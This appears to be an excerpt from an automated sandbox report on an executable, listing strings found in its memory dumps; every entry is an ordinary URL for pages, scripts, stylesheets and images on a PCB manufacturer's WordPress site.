                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/rohs/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/satisfaction-guarantee/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=18.1.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
